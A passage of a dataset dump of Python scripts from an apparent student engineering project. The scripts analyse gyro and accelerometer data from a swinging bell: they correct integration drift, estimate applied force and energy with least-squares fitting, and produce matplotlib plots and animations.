savgol_filter(force_corrected,window_length=25, polyorder=3)\n\n#get the indices where force is being applied and released\npeak_matrix = forcefinder(force_corrected).astype(int)\ntheta_dot_zeros,_ = find_peaks(abs(theta_dot[start:]),prominence=1)\n#get following data but when force isnt applied\nno_force_times = timestamps[start:]\nno_force_force = force\nno_force_theta = theta[start:]\nno_force_filtered_theta_double_dot = filtered_theta_double_dot[start:]\nfor i in 
range(len(peak_matrix)):\n force_range = range(peak_matrix[(len(peak_matrix)-1-i),0],peak_matrix[(len(peak_matrix)-1-i),2])\n no_force_times = np.delete(no_force_times,force_range)\n no_force_theta = np.delete(no_force_theta,force_range)\n no_force_force = np.delete(no_force_force,force_range)\n no_force_filtered_theta_double_dot = np.delete(no_force_filtered_theta_double_dot,force_range)\n#Optimise correction parameters again but only using no force data\ndef force_func2(corrections):\n theta_correction_factor,gradient_correction_factor,theta_offset = corrections[0],corrections[1],corrections[2]\n theta = no_force_theta*theta_correction_factor+theta_offset\n filtered_theta_double_dot = no_force_filtered_theta_double_dot*theta_correction_factor\n p = get_gradient(userinput)*gradient_correction_factor\n force = filtered_theta_double_dot-p*np.sin(theta)\n return sum(abs(force))\n\nres2=least_squares(fun=force_func2, x0=[1,1,0])\nprint(\"theta factor 2: \",res2.x[0],\"\\ngradient factor 2: \",res2.x[1],\"\\ntheta offset 2: \",res2.x[2],\"\\ncost 2: \",res2.fun)\ntheta_correction_factor2,gradient_correction_factor2,theta_offset2 = res2.x[0],res2.x[1],res2.x[2]\ntheta_corrected2 = theta*theta_correction_factor2+theta_offset2\np_corrected2 = p*gradient_correction_factor2\ntheta_dot_corrected2 = theta_dot*theta_correction_factor2\nforce_corrected2 = filtered_theta_double_dot[start:]*theta_correction_factor2-p_corrected2*np.sin(theta_corrected2[start:])\nsmooth_force_corrected2 = savgol_filter(force_corrected2,window_length=25, polyorder=3)\n\n# plt.plot(filtered_theta_double_dot[start:],np.sin(theta)[start:])\n# plt.plot(theta_correction_factor*filtered_theta_double_dot[start:],np.sin(theta_corrected)[start:])\n# plt.plot(theta_correction_factor2*filtered_theta_double_dot[start:],np.sin(theta_corrected2)[start:])\n\n\n###-------------------------------------------------------------------------###\n###--------------------------------ANIMATIONS-------------------------------###\n###-------------------------------------------------------------------------###\n#THETA_DOUBLE_DOT vs SIN(THETA) ANIMATION\nfig = plt.figure()\nax = plt.axes(xlim=(-1.5, 1.5), ylim=(-10,10))\nline, = ax.plot([], [], lw=1)\nline_corrected, = ax.plot([], [], lw=1)\nline_fit, = ax.plot([], [], lw=1)\ndef init():\n line.set_data([], [])\n line_corrected.set_data([], [])\n line_fit.set_data([], [])\n return line, line_corrected, line_fit,\n#Animation function. This is called sequentially\ndef animate(i):\n y = filtered_theta_double_dot[start:i+start]\n x = np.sin(theta[start:i+start])\n line.set_data(x, y)\n y_corrected = filtered_theta_double_dot[start:i+start]*theta_correction_factor2\n x_corrected = np.sin(theta[start:i+start]*theta_correction_factor2+theta_offset2)\n line_corrected.set_data(x_corrected, y_corrected)\n x_fit = np.array([-2,2])\n y_fit = p_corrected2*x_fit\n line_fit.set_data(x_fit, y_fit)\n return line, line_corrected, line_fit,\n#Call the animator. 
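FuncAnimation below calls init once, then animate for each frame index; 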
blit=True means only re-draw the parts that have changed.\nanim = animation.FuncAnimation(fig, animate, init_func=init,\n frames=len(theta), interval=20, blit=True)\n#Save the animation\n#anim.save('corrected.gif', fps=50, extra_args=['-vcodec', 'libx264'])\n#Plot the animation\nplt.xlabel(r'sin($\\theta$)')\nplt.ylabel(r'$\\\"{\\theta}$(rad/$s^2$)')\nplt.title(r'$\\\"{\\theta}$ vs sin($\\theta$)')\nplt.show()\n\n###-------------------------------------------------------------------------###\n###----------------------------------PLOTS----------------------------------###\n###-------------------------------------------------------------------------###\n#Plot line fit through theta double dot vs sin(theta) relationship\nx = np.sin(theta[start:])\ny = filtered_theta_double_dot[start:]\nx_corrected=np.sin(theta_corrected2[start:])\ny_corrected=filtered_theta_double_dot[start:]*theta_correction_factor2\nplt.plot(x,y,'.',label='Raw measurements') #plot all the data points\nplt.plot(x_corrected,y_corrected,'.',label='Corrected data') #plot all the data points\nplt.plot(x,p*x,label='Line fit through origin of original points') #plot the fitted line, through the origin\nplt.plot(x_corrected,p_corrected2*x_corrected,label='Line fit through origin of corrected points')\nplt.xlabel(r'sin($\\theta$)')\nplt.ylabel(r'$\\\"{\\theta}$(rad/$s^2$)')\nplt.title(r'$\\\"{\\theta}$ vs sin($\\theta$) with a line fitted through')\nplt.legend()\nplt.show()\n\n#Force, theta and theta_dot vs time\n# plt.plot(timestamps[start:],smooth_force,label=\"Force measurement (Smoothed)\")\n# plt.plot(timestamps[start:],smooth_force_corrected,label=\"Corrected force measurement (Smoothed)\")\nplt.plot(timestamps[start:],smooth_force_corrected2,label='Force after 2nd correction (Smoothed)')\nplt.plot(timestamps[start:],theta_corrected[start:],label=r'$\\theta$')\nplt.plot(timestamps[start:],theta_dot_corrected[start:],label=r'$\\dot{\\theta}$')\nplt.axhline(color='b',linestyle='--',linewidth='0.5')\nplt.xlabel(r't(s)')\nplt.ylabel(r'$\\\"{\\theta}+\\frac{mgl}{J}sin(\\theta)$(rad$s^{-2}$)')\nplt.axis([10,60,-5,6])\nplt.title(r'$\\frac{T}{J}$ vs time')\nplt.legend()\nplt.show()\n\n#Plot Force vs (mlg/J)sin(theta)\nplt.plot(-p*np.sin(theta[start:]),smooth_force,label=\"As measured\")\nplt.plot(-p_corrected2*np.sin(theta_corrected2[start:]),smooth_force_corrected2,label=\"Corrected\")\nplt.xlabel(r'$\\frac{mgl}{J}sin(\\theta)$(rad$s^{-2}$)')\nplt.ylabel(r'$\\frac{T}{J}(ms^{-2})$')\nplt.title(r'$\\frac{T}{J}$ vs $\\frac{mgl}{J}sin(\\theta)$')\nplt.axhline(color='b',linestyle='--',linewidth='0.5')\nplt.legend()\nplt.show()\n\n#Plot Force vs velocity\nplt.plot(theta_dot[start:],smooth_force,label=\"As measured\")\nplt.plot(theta_dot_corrected2[start:],smooth_force_corrected2,label=\"Corrected\")\nplt.xlabel(r'$\\dot{\\theta}$(rad$s^{-1}$)')\nplt.ylabel(r'$\\frac{T}{J}(ms^{-2})$')\nplt.axhline(color='b',linestyle='--',linewidth='0.5')\nplt.title(r'Force vs $\\dot{\\theta}$')\nplt.legend()\nplt.show()\n"
},
{
"alpha_fraction": 0.6326588988304138,
"alphanum_fraction": 0.6518025994300842,
"avg_line_length": 54.91987228393555,
"blob_id": "4c74d46e720c0b1dd2e541cd8167c31d732694e9",
"content_id": "76edcae5e66e07b0ea8c017d4f1809b20b43a3ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17447,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 312,
"path": "/pendulum1side.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "###-------------------------------------------------------------------------###\n###---------------------------------IMPORTS---------------------------------###\n###-------------------------------------------------------------------------###\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.optimize import least_squares\nfrom scipy.signal import find_peaks\nfrom scipy.signal import savgol_filter\nfrom scipy.integrate import cumtrapz\nfrom matplotlib import animation\n###-------------------------------------------------------------------------###\n###------------------------UNPACK DATA AND GET ZEROS------------------------###\n###-------------------------------------------------------------------------###\n#Gather and unpack data from CSV\nuserinput_file = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay26th/onesidepush4.csv'\nuserinput = genfromtxt(userinput_file,delimiter=',')\nfreeswing_file = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay26th/freeswing.csv'\nfreeswing = genfromtxt(freeswing_file,delimiter=',')\ntimestamps,a_r,a_theta,theta_dot = userinput[:,0], userinput[:,1], userinput[:,2], userinput[:,3]\n#Differentiate gyro signal to get angular acceleration, then smooth with Sav-Gol filter\ntheta_double_dot = np.gradient(theta_dot,timestamps)\nfiltered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)\n#Smooth the radial acceleration signal to find theta=zeros\nfiltered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\ntheta_zeros,_ = find_peaks(filtered_a_r,prominence=0.5)\nstart = theta_zeros[0]\nfree_start_zeros,_ = find_peaks(savgol_filter(freeswing[:,1],window_length=21, polyorder=2),prominence=0.5)\nfree_start = free_start_zeros[0]\n###-------------------------------------------------------------------------###\n###--------------------------------FUNCTIONS--------------------------------###\n###-------------------------------------------------------------------------###\n#Function for getting angle from gyro by re-integrating at every theta=0 and distributing the drift\ndef get_theta(data):\n #find theta=zeros\n timestamps = data[:,0]\n a_r = data[:,1]\n theta_dot = data[:,3]\n filtered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\n theta_zeros,_ = find_peaks(filtered_a_r,prominence=0.5)\n start = theta_zeros[0]\n #integrate theta and distribute drift before every zero\n theta_int_once = cumtrapz(theta_dot[start:],timestamps[start:],initial=0)\n theta_fix = np.zeros(len(timestamps)) #generate an array to hold the fixed theta\n theta_fix[start:] = theta_int_once #put the hard integrated theta between the first 2 zeros\n prev_zero = start #initiate the last theta=0 as the first one for the loop\n for _ in theta_zeros[1:]: #reintegrate and correct drift\n time_section = timestamps[prev_zero:_+1] #carve out the section between the 2 zeros\n theta_dot_section = theta_dot[prev_zero:_+1]\n theta_section = cumtrapz(theta_dot_section,time_section,initial=0) #make the integration\n drift = theta_section[-1] #find the drift at the end of the section\n drift_vec = np.linspace(start=0,stop=drift,num=_-prev_zero+1) #generate a vector increasing steadily from 0 to the drift over that time frame\n theta_fix[prev_zero:_] = theta_section[:-1]-drift_vec[:-1] #make the correction so the last theta=0\n prev_zero = _ #store the zero point for the next loop\n return theta_fix #returns the drift-fixed 
theta\n\n#Function for getting the gradient in the sin(theta) vs ang accel equation\ndef get_gradient(data):\n theta = get_theta(data) #get drift corrected theta from the data #find theta=zeros\n timestamps = data[:,0]\n theta_dot = data[:,3]\n start = find_peaks(savgol_filter(data[:,1],window_length=21, polyorder=2),prominence=0.5)[0][0]\n theta_double_dot = np.gradient(theta_dot,timestamps)\n x = np.sin(theta)[start:]\n y = savgol_filter(theta_double_dot,window_length=25, polyorder=3)[start:]\n p = np.polyfit(x,y,deg=1)[0] #fit a line through all of the data points\n return p\n\n#Function for finding where force is being applied\ndef forcefinder(force):\n smooth_force = savgol_filter(force,window_length=45,polyorder=3)\n low_smooth_force = savgol_filter(force,window_length=35,polyorder=3)\n peaks,_ = find_peaks(abs(low_smooth_force),prominence=1)\n peak_matrix = np.zeros((len(peaks),3))\n peak_matrix[:,1] = peaks\n peaks = np.append(peaks,len(smooth_force))\n prev_peak = 0\n count = 0\n for i in peaks:\n mini_peaks_before,_ = find_peaks(abs(low_smooth_force)[prev_peak:i],prominence=0)\n begin = mini_peaks_before[-1]+prev_peak\n prev_end = mini_peaks_before[0]+prev_peak\n if count != len(peaks)-1:\n peak_matrix[count,0] = begin\n if count != 0:\n peak_matrix[count-1,2] = prev_end\n prev_peak = i\n count+=1\n return peak_matrix.astype(int)\n\n###-------------------------------------------------------------------------###\n###-------------------------------OPTIMISATION------------------------------###\n###-------------------------------------------------------------------------###\n#Optimise correction parameters for freeswing\ndef force_func(corrections):\n theta_correction_factor,gradient_correction_factor,theta_offset = corrections[0],corrections[1],corrections[2]\n theta = get_theta(freeswing)*theta_correction_factor+theta_offset\n theta_double_dot = np.gradient(freeswing[:,3],freeswing[:,0])\n filtered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)*theta_correction_factor\n p = get_gradient(freeswing)*gradient_correction_factor\n force = filtered_theta_double_dot[start:]-p*np.sin(theta[start:])\n return sum(abs(force))\nres=least_squares(fun=force_func, x0=[1,1,0])\nprint(\"theta factor: \",res.x[0],\"\\ngradient factor: \",res.x[1],\"\\ntheta offset: \",res.x[2],\"\\ncost: \",res.fun)\ntheta_correction_factor,gradient_correction_factor,theta_offset = res.x[0],res.x[1],res.x[2]\n#get the -mlg/J gradient from fitting the userinput graph\np = get_gradient(userinput)\n#Use re-integrated, drift corrected theta from now on\ntheta = get_theta(userinput)\n#Calculate some force quantity T/J using just the userinput data\nforce = filtered_theta_double_dot[start:]-p*np.sin(theta[start:])\nsmooth_force = savgol_filter(force,window_length=25, polyorder=3)\n#Calculate it post corrections from freeswing data\np_corrected = p*gradient_correction_factor\ntheta_corrected = theta*theta_correction_factor+theta_offset\ntheta_dot_corrected = theta_dot*theta_correction_factor\nforce_corrected = theta_correction_factor*filtered_theta_double_dot[start:]-p_corrected*np.sin(theta_corrected[start:])\nsmooth_force_corrected = savgol_filter(force_corrected,window_length=25, polyorder=3)\n#get the indices where force is being applied and released\npeak_matrix = forcefinder(force_corrected)\n#get following data but when force isnt applied\nno_force_times = timestamps[start:]\nno_force_force = force\nno_force_theta = theta[start:]\nno_force_filtered_theta_double_dot = 
filtered_theta_double_dot[start:]\nfor i in range(len(peak_matrix)):\n    force_range = range(peak_matrix[(len(peak_matrix)-1-i),0],peak_matrix[(len(peak_matrix)-1-i),2])\n    no_force_times = np.delete(no_force_times,force_range)\n    no_force_theta = np.delete(no_force_theta,force_range)\n    no_force_force = np.delete(no_force_force,force_range)\n    no_force_filtered_theta_double_dot = np.delete(no_force_filtered_theta_double_dot,force_range)\n#Optimise correction parameters again but only using no force data\ndef force_func2(corrections):\n    theta_correction_factor,gradient_correction_factor,theta_offset = corrections[0],corrections[1],corrections[2]\n    theta = no_force_theta*theta_correction_factor+theta_offset\n    filtered_theta_double_dot = no_force_filtered_theta_double_dot*theta_correction_factor\n    p = get_gradient(userinput)*gradient_correction_factor\n    force = filtered_theta_double_dot-p*np.sin(theta)\n    return sum(abs(force))\nres2=least_squares(fun=force_func2, x0=[1,1,0])\nprint(\"theta factor 2: \",res2.x[0],\"\\ngradient factor 2: \",res2.x[1],\"\\ntheta offset 2: \",res2.x[2],\"\\ncost 2: \",res2.fun)\ntheta_correction_factor2,gradient_correction_factor2,theta_offset2 = res2.x[0],res2.x[1],res2.x[2]\ntheta_corrected2 = theta*theta_correction_factor2+theta_offset2\np_corrected2 = p*gradient_correction_factor2\ntheta_dot_corrected2 = theta_dot*theta_correction_factor2\nforce_corrected2 = filtered_theta_double_dot[start:]*theta_correction_factor2-p_corrected2*np.sin(theta_corrected2[start:])\nsmooth_force_corrected2 = savgol_filter(force_corrected2,window_length=35, polyorder=3)\n#find zero crossings of theta_dot, i.e. when bell is at extremes\ntheta_dot_zeros,_ = find_peaks(-abs(theta_dot_corrected2[start:]),prominence=1)\n#Produce clean force curve\nnoisy_peaks = find_peaks(-abs(smooth_force_corrected2),height=-0.5)[0]\nforce_curve = np.zeros(len(force_corrected2))\nstarts_and_ends = np.zeros((len(peak_matrix),2))\nforce_in = np.zeros(len(smooth_force_corrected2))\nforce_out = np.zeros(len(smooth_force_corrected2))\nenergy = np.zeros((len(peak_matrix),2))\npower = np.zeros((len(peak_matrix),2))\ncount = 0\n\nfor _ in peak_matrix[:,1]:\n    force_start = max(noisy_peaks[noisy_peaks<_])\n    force_end = min(noisy_peaks[noisy_peaks>_])\n    # starts_and_ends[count,0],starts_and_ends[count,1] = force_start,force_end\n    force_curve[force_start:force_end] = smooth_force_corrected2[force_start:force_end]\n    nearest_theta_dot_zero = theta_dot_zeros[abs(_-theta_dot_zeros).argmin()] #theta_dot zero closest to this force peak\n    if force_start<nearest_theta_dot_zero:\n        force_out[force_start:nearest_theta_dot_zero] = force_curve[force_start:nearest_theta_dot_zero]\n    if force_end>nearest_theta_dot_zero:\n        force_in[nearest_theta_dot_zero:force_end] = force_curve[nearest_theta_dot_zero:force_end]\n    energy[count,0] = max(cumtrapz(abs(force_in)[force_start:force_end],initial=0))\n    energy[count,1] = max(cumtrapz(abs(force_out)[force_start:force_end],initial=0))\n    power[count,0] = sum(np.multiply(abs(theta_dot_corrected2[start:])[force_start:force_end],abs(force_in)[force_start:force_end]))\n    power[count,1] = sum(np.multiply(abs(theta_dot_corrected2[start:])[force_start:force_end],abs(force_out)[force_start:force_end]))\n    count += 1\n\nplt.plot(timestamps[start:],np.multiply(theta_dot[start:],force_curve))\nplt.xlabel(r'time (s)')\nplt.ylabel(r'Power input $\\frac{T}{J}\\dot{\\theta}(s^{-3})$')\nplt.show()\nstored_energy = cumtrapz(np.multiply(theta_dot[start:],force_curve),initial=0) #starts at start\nzero_energy_line = 
np.polyfit(timestamps[start:],stored_energy,deg=1)\nenergy_corrected = stored_energy-(timestamps[start:]*zero_energy_line[0]+zero_energy_line[1])\nenergy_highs = find_peaks(energy_corrected)[0] #starts at start\n\nplt.plot(timestamps[start:],stored_energy,label='Stored energy')\nplt.plot(timestamps[start:][energy_highs],stored_energy[energy_highs],'x',label='Energy \"Highs\"')\nplt.plot(np.array([0,60]),np.array([0,60])*zero_energy_line[0]+zero_energy_line[1],'--',linewidth=0.5,label='Line fitting energy \"zeros\"')\nplt.xlabel(r'time (s)')\nplt.ylabel(r'System energy $\\int{\\frac{T}{J}\\dot{\\theta}}dt(s^{-2})$')\nplt.legend()\nplt.show()\n\nplt.plot(timestamps[start:],energy_corrected,label='Stored energy accounting for friction')\nplt.plot(timestamps[start:][energy_highs],energy_corrected[energy_highs],'x')\nplt.axhline(linestyle='--',linewidth=0.5)\nplt.xlabel(r'time (s)')\nplt.ylabel(r'System energy adjusted for friction $\\int{\\frac{T}{J}\\dot{\\theta}}dt(s^{-2})$')\nplt.show()\n\n# plt.plot(timestamps[start:],savgol_filter(theta_corrected2,window_length=21,polyorder=3)[start:])\n# plt.plot(timestamps[start:],smooth_force_corrected2)\nmax_angle_points = find_peaks(theta_corrected2[start:],prominence=0)[0]\n# plt.plot(timestamps[start:][max_angle_points],theta_corrected2[start:][max_angle_points],'x')\n# plt.plot(timestamps[start:],stored_energy)\n# plt.plot(timestamps[start:],50*smooth_force_corrected2)\n\n# plt.plot(timestamps[start:],theta_corrected2[start:])\n# plt.plot(timestamps[start:][theta_dot_zeros],theta_corrected2[start:][theta_dot_zeros],'x')\nplt.plot(energy_corrected[energy_highs][:-1],abs(theta_corrected2[start:][max_angle_points])[1:],'x')\ncorrelation = np.polyfit(energy_corrected[energy_highs][:-1],abs(theta_corrected2[start:][max_angle_points])[1:],deg=1)\nplt.plot(np.array([-25,50]),np.array([-25,50])*correlation[0]+correlation[1],'--',linewidth=0.5)\nerr = np.mean(abs(abs(theta_corrected2[start:][max_angle_points][1:])-(energy_corrected[energy_highs][:-1]*correlation[0]+correlation[1])),axis=0)\nprint(err)\nplt.ylabel(r'Angle at max (rad)')\nplt.xlabel(r'System energy calculated $\\int{\\frac{T}{J}\\dot{\\theta}}dt(s^{-2})$')\nplt.show()\n\nplt.plot(timestamps[start:],energy_corrected,label='Stored energy accounting for friction')\nenergy_calculation = 0.5*(1-p_corrected2*100/9.81)*theta_dot - p_corrected2*(1-np.cos(theta))\nplt.plot(timestamps-timestamps[start],energy_calculation,label='Energy Calculated')\nplt.axhline(linestyle='--',linewidth=0.5)\nplt.xlabel(r'time (s)')\nplt.ylabel(r'System energy calculated $\\int{\\frac{T}{J}\\dot{\\theta}}dt(s^{-2})$')\nplt.show()\n###-------------------------------------------------------------------------###\n###-------------------------------UNCERTAINTY-------------------------------###\n###-------------------------------------------------------------------------###\ndef remove_mean(data):\n    start = find_peaks(savgol_filter(data[:,1],window_length=21, polyorder=2),prominence=5)[0][0]\n    theta_double_dot = np.gradient(data[:,3],data[:,0])[start:]\n    filtered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)\n    p = get_gradient(data)\n    theta = get_theta(data)[start:]\n    force = filtered_theta_double_dot-p*np.sin(theta)\n    no_bins = 20\n    means_variance = np.zeros([no_bins,2])\n    free_theta = get_theta(freeswing)[free_start:]\n    free_p = get_gradient(freeswing)\n    free_theta_double_dot = np.gradient(freeswing[:,3][free_start:],freeswing[:,0][free_start:])\n    
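# Savitzky-Golay smoothing here assumes roughly uniform sampling in time\n    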
free_filtered_theta_double_dot = savgol_filter(free_theta_double_dot,window_length=25, polyorder=3)\n free_force = free_filtered_theta_double_dot-free_p*np.sin(free_theta)\n fixed_force = filtered_theta_double_dot-p*np.sin(theta)\n for bin in range(no_bins):\n bin_start = (bin-no_bins/2)*2*np.pi/no_bins\n bin_end = (bin-no_bins/2+1)*2*np.pi/no_bins\n free_bin_indices = np.where((free_theta>=bin_start)&(free_theta<bin_end))\n data_bin_indices = np.where((theta>=bin_start)&(theta<bin_end))\n if np.size(free_bin_indices)>0:\n means_variance[bin,0] = np.mean(free_force[free_bin_indices])\n means_variance[bin,1] = np.var(free_force[free_bin_indices])\n fixed_force[data_bin_indices] = force[data_bin_indices] - means_variance[bin,0]\n return fixed_force, means_variance\n\"\"\"\n###-------------------------------------------------------------------------###\n###--------------------------------ANIMATIONS-------------------------------###\n###-------------------------------------------------------------------------###\n#THETA_DOUBLE_DOT vs SIN(THETA) ANIMATION\n\nfig = plt.figure()\nax = plt.axes(xlim=(-1.5, 1.5), ylim=(-10,10))\nline, = ax.plot([], [], lw=1)\ndef init():\n line.set_data([], [])\n return line,\n#Animation function. This is called sequentially\ndef animate(i):\n y = filtered_theta_double_dot[start:start+i]\n x = np.sin(theta[start:start+i])\n line.set_data(x, y)\n return line,\n#Call the animator. blit=True means only re-draw the parts that have changed.\nanim = animation.FuncAnimation(fig, animate, init_func=init, frames=len(theta), interval=20, blit=True)\n#Save the animation\n#anim.save('2sidepushfix.gif', fps=50, extra_args=['-vcodec', 'libx264'])\n#Plot the animation\nx = np.array([-2,2])\nplt.plot(x,p*x,'r',linewidth=1,label=\"Fit\") #plot the fitted line, through the origin\nplt.xlabel(r'sin($\\theta$)')\nplt.ylabel(r'$\\\"{\\theta}$(rad/$s^2$)')\nplt.title(r'$\\\"{\\theta}$ vs sin($\\theta$)')\nplt.show()\n\"\"\"\n#PENDULUM AND FORCE ANIMATION\nfig_pend = plt.figure()\nax_pend = plt.axes(xlim=(-1.5, 1.5), ylim=(-1.5,1.5))\nbell, = ax_pend.plot([], [], 'bo', lw=5,label='Bell')\ntorque, = ax_pend.plot([], [], 'ro', lw=5, label='Force')\ndef init_pend():\n bell.set_data([], [])\n torque.set_data([], [])\n return bell, torque,\n#Animation function. This is called sequentially\ndef animate_pend(i):\n y = -np.cos(theta_corrected2[i+start]) #Bell's y position\n x = np.sin(theta_corrected2[i+start]) #Bell's x position\n bell.set_data(x, y)\n x_torque = force_curve[i] #Torque/J at time i\n torque.set_data(x_torque/3,0)\n return bell, torque,\n#Call the animator. blit=True means only re-draw the parts that have changed.\nanim_pend = animation.FuncAnimation(fig_pend, animate_pend, init_func=init_pend, frames=len(theta[start:]), interval=20, blit=True)\n#anim_pend.save('2sidepush_force.gif', fps=50, extra_args=['-vcodec', 'libx264'])\nplt.title('Bell swinging and force applied')\nplt.legend()\nplt.show()\n\n###-------------------------------------------------------------------------###\n###----------------------------------PLOTS----------------------------------###\n###-------------------------------------------------------------------------###\n"
},
{
"alpha_fraction": 0.6580516695976257,
"alphanum_fraction": 0.6858847141265869,
"avg_line_length": 30.4375,
"blob_id": "fe2369c896ea503031c03d9290d75e6a697f1768",
"content_id": "4c234ba9f5cc9ba39f916ad54d0b784f14b14055",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1509,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 48,
"path": "/despiker.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "from numpy import genfromtxt\nimport numpy as np\nimport csv\nimport matplotlib.pyplot as plt\n\n\ndef despiker(data):\n #gather the data and put the columns into seperate variables\n ringing_data = genfromtxt(data, delimiter=',')\n times = ringing_data[:,0]\n masses = ringing_data[:,1]\n\n\n #shift the data down by 1 reading\n first_value = masses[0]\n shifted = masses[0:-1]\n shifted = np.insert(shifted,0,first_value)\n\n #find difference of data and shifted data to identify outliers\n spikes = abs(masses-shifted)\n # index the spikes\n indices = np.array(np.where(spikes>10))\n indices = indices.transpose()\n # at each spike, replace the error by an interpolation. i+3 since some spikes are over 2 readings\n for i in indices:\n masses[i] = (masses[i-1] + masses[i+3])/2\n #concatenate the timestamps with the new smoothed mass data\n despiked = np.column_stack((times,masses))\n\n return despiked\n\nfile = '/Users/shuowanghe/github/IIB-Project/rawdata 7:12:19/arms.csv'\na = despiker(file)\nr = genfromtxt(file, delimiter=',')\nnp.savetxt(\"/Users/shuowanghe/github/IIB-Project/processed 7:12:19/smooth_arms.csv\", a, delimiter=\",\")\nflipped = a\nflipped[:,1] = 77*np.ones(len(a))-a[:,1]\na = despiker(file)\nnp.savetxt(\"/Users/shuowanghe/github/IIB-Project/processed 7:12:19/flipped_arms.csv\", flipped, delimiter=\",\")\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nplt.plot(a[:,0],r[:,1])\nplt.show()\nplt.plot(a[:,0],a[:,1])\nplt.show()\nplt.plot(a[:,0],flipped[:,1])\nplt.show()\n"
},
{
"alpha_fraction": 0.6152758002281189,
"alphanum_fraction": 0.6534653306007385,
"avg_line_length": 26.19230842590332,
"blob_id": "0e5907ea610a8c4df73cb20ebb7793f64cd0bfac",
"content_id": "d38abbad81edc0e6a9ddca28be7d37c36e6c56be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 707,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 26,
"path": "/tester2.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\nfrom numpy import genfromtxt\n\ndata = genfromtxt('/Users/shuowanghe/github/IIB-Project/processed 22:11:19 Benet/flipped_ringingvid1.csv', delimiter=',')\n\nx = data[:,0]\ny = data[:,1]\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nline, = ax.plot([],[],lw=2)\nax.set_ylim(-2, np.max(y))\nax.set_xlim(0, np.max(30))\ndef animate(i):\n\n ax.set_xlim(x[i]-5, x[i]+1)\n line.set_xdata(x[:i])\n line.set_ydata(y[:i])\n\n return line,\n\nani = animation.FuncAnimation(fig, animate, frames=len(x),\n interval=3.6, blit=False)\nani.save('ringingvid1.gif', fps=50, extra_args=['-vcodec', 'libx264'])\n"
},
{
"alpha_fraction": 0.6365965604782104,
"alphanum_fraction": 0.6532497406005859,
"avg_line_length": 58.327999114990234,
"blob_id": "240cff20d7dc907a5b1d2e18824196163bbf5cd3",
"content_id": "1e4e0f4508cd967dfe1e618f4ab1618313c87973",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14832,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 250,
"path": "/uncertainties.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "###-------------------------------------------------------------------------###\n###---------------------------------IMPORTS---------------------------------###\n###-------------------------------------------------------------------------###\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.optimize import least_squares\nfrom scipy.signal import find_peaks\nfrom scipy.signal import savgol_filter\nfrom scipy.integrate import cumtrapz\n###-------------------------------------------------------------------------###\n###------------------------UNPACK DATA AND GET ZEROS------------------------###\n###-------------------------------------------------------------------------###\n#Gather and unpack data from CSV\nuserinput_file = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay5th/userinput.csv'\nuserinput = genfromtxt(userinput_file,delimiter=',')\nfreeswing_file = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay5th/freeswing.csv'\nfreeswing = genfromtxt(freeswing_file,delimiter=',')\ntimestamps,a_r,a_theta,theta_dot = userinput[:,0], userinput[:,1], userinput[:,2], userinput[:,3]\n#Differentiate gyro signal to get angular acceleration, then smooth with Sav-Gol filter\ntheta_double_dot = np.gradient(theta_dot,timestamps)\nfree_theta_double_dot = np.gradient(freeswing[:,3],freeswing[:,0])\nfiltered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)\nfree_filtered_theta_double_dot = savgol_filter(free_theta_double_dot,window_length=25, polyorder=3)\n#Smooth the radial acceleration signal to find theta=zeros\nfiltered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\ntheta_zeros,_ = find_peaks(filtered_a_r,prominence=5)\nstart = theta_zeros[0]\nfree_start_zeros,_ = find_peaks(savgol_filter(freeswing[:,1],window_length=21, polyorder=2),prominence=5)\nfree_start = free_start_zeros[0]\n###-------------------------------------------------------------------------###\n###--------------------------------FUNCTIONS--------------------------------###\n###-------------------------------------------------------------------------###\n#Function for getting angle from gyro by re-integrating at every theta=0 and distributing the drift\ndef get_theta(data):\n #find theta=zeros\n timestamps = data[:,0]\n a_r = data[:,1]\n theta_dot = data[:,3]\n filtered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\n theta_zeros,_ = find_peaks(filtered_a_r,prominence=5)\n start = theta_zeros[0]\n #integrate theta and distribute drift before every zero\n theta_int_once = cumtrapz(theta_dot[start:],timestamps[start:],initial=0)\n theta_fix = np.zeros(len(timestamps)) #generate an array to hold the fixed theta\n theta_fix[start:] = theta_int_once #put the hard integrated theta between the first 2 zeros\n prev_zero = start #initiate the last theta=0 as the first one for the loop\n for _ in theta_zeros[1:]: #reintegrate and correct drift\n time_section = timestamps[prev_zero:_+1] #carve out the section between the 2 zeros\n theta_dot_section = theta_dot[prev_zero:_+1]\n theta_section = cumtrapz(theta_dot_section,time_section,initial=0) #make the integration\n drift = theta_section[-1] #find the drift at the end of the section\n drift_vec = np.linspace(start=0,stop=drift,num=_-prev_zero+1) #generate 